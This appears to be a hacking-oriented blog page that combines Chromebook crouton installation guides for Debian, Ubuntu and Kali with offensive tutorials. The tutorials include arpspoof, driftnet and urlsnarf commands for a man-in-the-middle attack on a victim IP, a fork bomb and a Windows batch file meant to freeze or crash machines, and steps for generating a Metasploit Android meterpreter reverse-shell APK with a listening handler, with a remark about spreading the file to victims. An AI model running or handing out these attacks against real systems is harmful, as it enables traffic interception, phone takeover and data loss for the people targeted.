How to Install Debian on chromebook with crouton

What is Debian Linux and why do I want it on my Chromebook!

Debian on Chromebook

Debian is a Linux distribution comprised of open source software that is the bases of a large variety of Linux distribution. Kali, Ubuntu & Mint are a few examples of linux distors built on-top of Debian. Debian is also widely accepted as the solid linux.

How do I install it?

To install Debian on Chromebook you must be in developer mode. please reference the following page to learn how to enter  developer mode.

Once in developer mode you need to download crouton.

Open the crosh terminal (CTLR+ALT+T).

enter shell mode by typing shell / enter.

from shell type sh ~/Downloads/crouton -r debian -t kde -n debian

-r is the release. We need to set this to debian. If the -r switch is not passed Ubuntu will be installed.

-t is the target command that specifies what GUI interface you want installed by default. Gnome is the default gui for kali however it does not work on my HP Chromebook 14″. KDE works and is a  good alternative to Gnome.

-n is the name parameter. We define the -n switch here so we can give the chroot a custom name of debian.

As of this article I do not recommend gnome for the target gui on the HP Chromebook 14.

The process will run and install debian on the system.

at some point you will be prompted for a user name and password.

How do I start Debian on chromebook?

Once the install is complete from the shell type sudo startdebian. (This is also known as chroot)

this will start the Debian instance.

To transition seamlessly from chromeos and unity press CTRL+ALT+<=(backward) for chromeos and CTRL+ALT+=>(forward).

if the machine is rebooted you will have to enter shell and type sudo startdebian again.

it is possible to install multiple chroots.

Want to know more?

Read more

by Malik korrich ~ dimanche 29 mars 2015 0 commentaires

Turn Chromebook on Developer Mode

How do I turn on developer mode on a Chromebook?
Warning: Entering developer mode will wipe all data off of the SSD.

on a HP Chromebook  14″ With the machine booted Press ESC+REFRESH BUTTON + POWER at the same time.



The chromebook will reboot and you will be met with a message stating “ChromeOS is missing or not found”. Press CTL+D on the keyboard to skip this message. You will then be prompted by another message stating “To turn OS Verification off press enter”. Press ENTER. Your chromebook will then reboot, and prompt with a screen stating “OS Verification is off”. Press CTL+D to skip this message. You will then be prompted with a message “Your system is transitioning into developer mode. Local data has been cleared. Modifications you make to the system are not supported by Google, may cause hardware damage and may void your warranty. To cancel, turn your computer off now”. A timer is set in the top left hand corner of the screen to 30 seconds. Wait for the timer to reach 0. Once the timer has reached 0 you will be prompted with a new message “Preparing system for developer mode. This may take awhile. Do not turn your computer off until it restarts”. Wait for this process to complete; Once the process has complete the chromebook will reboot and you will be met with the message again “OS Verification is off”. Press CTL+D to skip this screen and boot the machine.

Chromebook OS Verification

Note: If you wish to restore your chromebook back to factory and re-wipe your data, reboot your chromebook and press space bar when the following message appears “OS Verification is off. Press space to re-enable”. Pressing space bar will reset your chromebook back to factory with OS verification back on.

Once the chromebook is in developer mode you will be able to take full advantage of the shell command. The shell command is access from the crosh terminal window.

To access the crosh terminal windows press CTLR+ALT+T on your keyboard.

Once open type shell and press enter. This puts you into a shell capable of some basic linux commands. This mode is also used for loading linux with the crouton script.

Read more

by Malik korrich ~ 0 commentaires

Install Ubuntu on a Chromebook

What is Ubuntu and why do I want it on my Chromebook!

Ubuntu is a linux distribution that is widely accepted as the most commonly installed linux distro. It is used as a alternative, althought not a direct replacement, for windows or Mac. Ubuntu extends the functionality of the chromebook, making the chromebook viable for developers, hackers, techies, and the common user.

Why not just install windows?

The underlying architecture from chrome os is strongly based on linux and Ubuntu. Although Im sure it is possible to install windows on a chromebook you would have the dual boot/chrooted awesomeness of both chromeOS and Ubuntu.

How do I install Ubuntu on a Chromebook?

To install Ubuntu on a chromebook it must be in developer mode. please reference the following page to learn how to enter  developer mode.

Once in developer mode you need to download crouton.

Open the crosh terminal (CTLR+ALT+T).

enter shell mode by typing shell / enter.

from shell type sh ~/Downloads/crouton -t unity

12.04 ubuntu is installed by default. You can switch the release of ubuntu by using the -r command.

-t is the target command that specifies what GUI interface you want installed by default. Unity is recommended by me out of the box for Ubuntu for two reasons.

 it works

 it is the default GUI installed when doing a fresh install of Ubuntu.

as of this article I do not recommend gnome for the target gui on the HP Chromebook 14.

The process will run and install ubuntu on the system.

at some point you will be prompted for a user name and password.

How do I start Ubuntu on a Chromebook?

Once the install is complete from the shell type sudo startunity. (This is also known as chroot)

this will start the unity instance.

To transition seamlessly from chromeos and unity press CTRL+ALT+<=(backward) for chromeos and CTRL+ALT+=>(forward).

if the machine is rebooted you will have to enter shell and type sudo startunity again.

Read more

by Malik korrich ~ 0 commentaires

How to install Kali Linux on HP Chromebook 14

Kali Linux
What is Kali Linux and why do I want it on my Chromebook!

Kali is a Linux distribution that is widely accepted as the Linux distribution for penetration testers, security experts and hackers. It is the successor to Backtrack Linux. Kali allows the user to install packages such as aircrack-ng and reaver to collect data on and hack into wireless networks.

How Do I Install Kali Linux on a Chromebook?
To install Kali on a Chromebook with crouton, the Chromebook must be in developer mode. please reference the following page to learn how to enter  developer mode.

Once in developer mode you need to download a special forked version of crouton. Kali has not yet been pulled into the master crouton project on github.

UPDATE: Kali has been added into the main crouton tree. You can download it here crouton.

Open the crosh terminal (CTLR+ALT+T).

enter shell mode by typing shell / enter.

from shell type sudo sh ~/Downloads/crouton -r kali -t kde -n kali

-r is the release. We need to set this to Kali. If the -r switch is not passed Ubuntu will be installed.

-t is the target command that specifies what GUI interface you want installed by default. Gnome is the default unity for kali however it does not work on my HP Chromebook 14″. KDE works and is a  good alternative to Gnome.

-n is the name parameter. We define the -n switch here so we can give the chroot a custom name of kali.

As of this article I do not recommend gnome for the target gui on the HP Chromebook 14.

The process will run and install kali on the system.

at some point you will be prompted for a user name and password.

How Do I Run Kali Linux on a Chromebook?
Once the install is complete from the shell type sudo startkde.

this will start the Kali instance.

To transition seamlessly from chromeos and unity press CTRL+ALT+<=(backward) for chromeos and CTRL+ALT+=>(forward).

if the machine is rebooted you will have to enter shell and type sudo startkde again.

Endless Possibilities:
it is possible to install multiple chroots.

Read more

by Malik korrich ~ 0 commentaires

Kali Linux Man in the Middle Attack- Kali Linux Tutorial

Today our tutorial will talk about Kali Linux Man in the Middle Attack. How to perform man in the middle attack using Kali Linux?we will learn the step by step process how to do this.

I believe most of you already know and learn about the concept what is man in the middle attack, but if you still don't know about this, here is some definition from wikipedia.

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

Scenario:

This is the simple scenario, and I try to draw it in a picture.

Victim IP address : 192.168.8.90

Attacker network interface : eth0; with IP address : 192.168.8.93

Router IP address : 192.168.8.8

Requirements:

1. Arpspoof

2. Driftnet

3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because act as man in the middle attacker, Kali Linux must act as router between "real router" and the victim. Read the tutorial here how to set up packet forwarding in linux.

2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting kali linux terminal window.

3. The next step is setting up arpspoof between victim and router.

arpspoof -i eth0 -t 192.168.8.90 192.168.8.8

4. And then setting up arpspoof from to capture all packet from router to victim.

arpspoof -i eth0 192.168.8.8 192.168.8.90

5. After step three and four, now all the packet sent or received by victim should be going through attacker machine.

6. Now we can try to use driftnet to monitor all victim image traffic. According to its website,

Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

7. To run driftnet, we just run this

driftnet -i eth0

When victim browse a website with image, driftnet will capture all image traffic as shown in the screenshot below.

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal

8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code

urlsnarf -i eth0

and urlsnarf will start capturing all website address visited by victim machine.

9. When victim browse a website, attacker will know the address victim visited.

Here is the video in case you can't get the text explanations above.

Conclusion:

1. To change or spoof the attacker MAC address, you can view the tutorial about how to change kali linux MAC address.

2. Driftnet or Urlsnarf was hard to detect, but you can try to find the device in your network with promiscious mode which have possibliity to sniff the network traffic.

Hope you found it useful 

- See more at: http://www.hacking-tutorial.com/hacking-tutorial/kali-linux-man-middle-attack/#sthash.p8piGoyv.dpuf

Read more

by Malik korrich ~ samedi 30 août 2014 0 commentaires

Denial of Service Attack : EXPLAINED FOR BEGINNERS AND DUMMIES

Just like most other things associated with hacking, a denial of service attack is not everyone's cup of tea. It, however, can be understood if explained properly. In this tutorial, I'll try to give you a big picture of denial of service attacks, before I start using geeky terms like packets and all that. We'll start at the easiest point.

What effect does a denial of service attack have

Wireless hacking usually gives you the password of a wireless network. A man in the middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a payload gives you access and control over the target machine. What exactly does a Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a resource from the right to use it. I mean if I successfully perform a DOS on your machine, you won't be able to use it anymore. In the modern scenario, it is used to disrupt online services. Many hacktivist groups (internet activists who use hacking as a form of active resistance - a name worth mentioning here is Anonymous) do a Distributed Denial of service attack on government and private websites to make them listen to the people's opinion (the legitimacy of this method of dictating your opinion has been a topic of debate, and a lot of hactivists had to suffer jailtime for participating in DDOS). So basically it's just what its name suggests, Denial Of Service.

Basic Concept

It uses the fact that while a service can be more than sufficient to cater to the demands of the desired users, a drastic increase in unwelcome users can make the service go down. Most of us use the words like "This website was down the other day" without any idea what it actually means. Well now you do. To give you a good idea of what is happening, I'll take the example from the movie "We Are Legion".

Scenario One : Multiplayer online game

Now consider you are playing an online multi-player game. There are millions of other people who also play this game. Now there's a pool in the game that everyone likes to visit. Now you and your friends know that they have the power of numbers. There are a lot of you, and together you decide to make identical characters in the game. And then all of you go and block the access to the pool. You just carried out a denial of service attack. The users of the game have now been deprived of a service which they had obtained the right to use when they signed up for the game. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago. This is the kind of thing that gives you a very basic idea what a denial of service attack can be.

They made a Swastika and blocked access to the pool

Scenario 2 : Bus stop

Now assume that due to some reason, you want to disrupt the bus service of your city and stop the people from using the service. To stop the legitimate people from utilizing this service, you can call your friends to unnecessarily use it. Basically you can invite millions of friends to come and crowd around all the bus stops and take the buses without any purpose. Practically it is not feasible since you don't have millions of friends, and they are definitely not wasting their time and money riding aimlessly from one place to another.

So while this may seem impossible in the real world, in the virtual world, you can cause as much load as a thousand (or even a million) users alone at the click of a button. There are many tools out there for this purpose, however, you are not recommended to use them as a DOS on someone else is illegal, and easy to detect (Knock, knock. It's the police). We will, come back to this later, and do a DOS on our own computer.

How denial of service attacks are carried out

Basically, when you visit a website, you send them a request to deliver their content to you. What you send is a packet. Basically, it take more than just one packet, you need a lot of them. But still, the bandwidth that you consume in requesting the server to send you some data is very little. In return, the data they send you is huge. This takes up server resources, for which they pay for. A legitimate view can easily earn more than the server costs on account of advertisements, etc. So, companies buy server that can provide enough data transfer for its regular users. However, if the number of users suddenly increases, the server gives up. It goes down. And since the company knows it under DOS, it just turns off the server, so that it does not have to waste its monetary resources on a DOS, and wait till the DOS stops. Now with the modern computers and bandwidth, we alone can easily pretend to be a thousand or even more users at once. While this is not good for the server, it is not something that can make it succumb (your computer is not the only thing that gets better with time, the servers do too). However, if a lot of people like you do a DOS attack, it becomes a distributed denial of service attack. This can easily be fatal for a server. It's just like you go to a page, and start refreshing it very fast, maybe a thousand times every second. And you are not the only one. There are thousand others that are doing the same thing. So basically you guys are equivalent to more than a million users using the site simultaneously, and that's not something the server can take. Sites like Google and Facebook have stronger servers, and algorithms that can easily identify a DOS and block the traffic from that IP. But it's not just the websites that get better, and the black hat hackers too are improving every day. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides ( the good, the bad and the ugly). 

A Live DOS on your Kali Machine

If you have Kali linux (The hackers OS- the OS of choice if you use this blog) the here's a small exercise for you. 

We are going to execute a command in the Kali linux terminal that will cripple the operating system and make it hand. It will most probably work on other linux distributions too.

Warning : This code will freeze Kali linux, and most probably it will not recover from the shock. You'll lose any unsaved data. You will have to restart the machine the hard way (turn of the virtual machine directly or cut the power supply if its a real machine). Just copy paste the code and your computer is gone.

:(){ :|:& };:

The machine froze right after I pressed enter. I had to power it off from the Vmware interface.

What basically happened is that the one line command asked the operating system to keep opening process very fast for an infinite period of time. It just gave up.

Here's something for the Windows Users

Crashing Windows Using Batch file

Open a notepad. Put the following code in it-

:1
Start
goto 1

Save the file as name.bat

Bat here is batch file extension. Run it. Game over.

It basically executes the second line, and the third line makes it go over to the first, execute the second, and then over to first again, execute the second..... infinitely. So again, denial of service. All the processing power is used by a useless command, while you, the legitimate user, can't do anything.

That's it for this tutorial, we'll discuss the technical details of a practical denial of service in a later tutorial.

Read more

by Malik korrich ~ jeudi 7 août 2014 0 commentaires

Hack Router Password Hack Using Medusa Kali linux Tutuorial

Heloo Guys In tis tutuorial i will show you how to hack router passwords with kali linux                                                                                     

 

Read more

by Malik korrich ~ lundi 26 mai 2014 0 commentaires

How to Creat Penetration testing Lab in Kali Linux Tutorial

Hello, friends I hope you've been up-to my previous post : Brute Force Attack & Backdoor Website Hacking, In these two previous post - I was using DVWA + OWASP-BWA + Backtrack, that means two penetration testing lab with Bactrack hacking OS. It's cool, comfortable to hack using Bactrack or Kali Linux. As you know guys - we've posted many Penetration testing lab creation articles but yet we haven't posted any article that can help learner to connect Penetration testing lab with Backtrack or any other Hacking OS. Finally your wait is over, Read this Post.

Penetration testing lab with Kali Linux or (Backtrack)

If you're using Backtrack then it's good and if you've Kali Linux then too Good. Simply here you'll not require to install any OS on your system - you can do it on your present running OS. Just complete below requirements and you're done.

Requirements :

• VM Ware Player [Download]
• Kali Linux or Backtrack
• OWASP-BWA Penetration testing lab [Install it now]

System Requirement :

• Minimum 2GB RAM but (Recommended 3GB RAM)
• 2.5 Ghz or Best in 3Ghz
• Display minimum : 1024x768

What's new in this Penetration testing lab ? 
                  Well nothing is much new in this, but let me talk about some more addition and features - that can really helps you a lot for Pentesting.
DVWA + NOWASP (Mutillidae) + OWASP -BWA + Kali Linux + Windows 7 + OWASP Mantra Janus + Ghost Security + Web Goat =  Super Penetration testing lab. When all this Penetration testing lab will be one system & run at one time in Kali Linux or Bactrack - m sure it will definitely rock up hackers, learners & Pentesters. So Keep Calm & Proceed to next step.

Steps to Create Penetration testing lab
               It isn't too much hard to create Penetration testing lab with OWASP-BWA - Connect it with Backtrack or Kali Linux & Penetrate. Simply if you'll follow below all steps properly, you'll get success.

1. First of all learn to Install Kali Linux or Backtrack in VM Ware.

Watch Video on You-Tube [Click Here]

2. Now, Create OWASP-BWA Penetration testing lab in your system & Start it in VM Ware and at same time create one more Virtual Machine Kali Linux or (Backtrack), So it will start two Virtual machine with Dual Virtual Network.

3. 1st Network = OWASP-BWA Pentest lab. 2nd Network = Kali Linux or Backtrack

4. It will definitely eats up your RAM & CPU so I'll recommend you to stop all background process to speed up system & gain more memory & CPU 

5. We're using two OS with three two virtual network + One Original Non-Splitted Network of your current running OS. Well you can also pentest on your current OS using Backtrack Metasploit, Reverse Engineering, Brute Force, Cracking attacks. 

6. Okay, if you don't know how to create this pentest lab watch out below video.

Watch Video on You-Tube [Click Here]

7. This tutorial is simply very easy, Just be patience while Installing VM Ware & you'll require to read my previous Penetration testing lab tutorials & Articles. 

Fore more Gazing Hacking related Articles Stay connected with us

Read more

by Malik korrich ~ 0 commentaires

Hacking Android Smartphone using Metasploit in Kali Linux

What is android? according to wikipedia:
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.

Here is some initial information for this tutorial:

Attacker IP address: 192.168.8.94

Attacker port to receive connection: 443

Requirements:

1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)

2. Android smartphone (we use HTC One android 4.4 KitKat)

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.

2. We will utilize Metasploit payload framework to create exploit for this tutorial.

msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=

As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command

3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.

Info:

use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.

Info:

set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection

5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution  ).

6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:

7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.

See the video below if you are not clear about the step by step Hacking Android Smartphone Tutorial using Metasploit above:

Conclusion:

1. Don't install APK's from the unknown source.

2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.

Share this post if you found it useful

Read more

by Malik korrich ~ 0 commentaires